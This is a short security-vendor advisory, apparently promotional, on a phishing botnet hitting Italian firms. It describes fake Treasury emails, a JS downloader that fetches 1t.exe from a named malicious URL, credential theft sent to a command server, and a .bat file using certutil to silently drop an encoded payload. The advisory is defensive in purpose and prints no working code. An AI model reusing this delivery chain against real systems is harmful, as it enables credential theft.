The Italian Botnet Attacks
Cynet Detects the Mail Botnet That Has Been Hitting Italian Companies
The Cynet 360 holistic security platform successfully detects the latest Botnet to hit Italian companies. The Botnet comes by way of a legitimate-looking email appearing as if sent by the Italian Department of Treasury using subjects such as, “Codici Tributo Acconti” (Tribute Advocates Codes).
The attacker has chosen a subject that people are likely to fall for, as this subject line is used frequently within the framework of business administration. The e-mails though, are sent from unknown addresses not related to the Italian Department of Treasury. Some of the reported addresses include: [email protected] or [email protected].
The mail has a link that opens the browser and downloads a JS file. It then uses a GET connection to 239outdoors.com/themes5.php, to drop a file called 1t.exe to the host. The file (which looks like banker malware) is then executed by the JS, which communicates with CNC server, awaiting commands and sending the CNC the stolen credentials. It also sends details of IPs, persistence, etc.
Additionally, the URL appears to drop another malicious threat, “Nuovo Documento 2008.” This is a .bat file that uses the “certutil for delivery of file” technique to drop and execute another file, which downloads an encoded payload. The technique is silent and does not raise red flags for suspicious activity. After decoding and running the payload unslaa.exe, it behaves the same as 1t.exe. The file also communicates with the same CNC server.
The Cynet 360 system detects and protects against these attacks. As part of best security practices, we recommend that together with utilizing a comprehensive security platform like Cynet, organizations educate employees to:
- Proceed cautiously with email attachments.
- Check carefully before clicking unfamiliar links in email messages
Still have questions or want to know how Cynet 360 can help you protect your organization against botnets and other threats? Contact us: [email protected].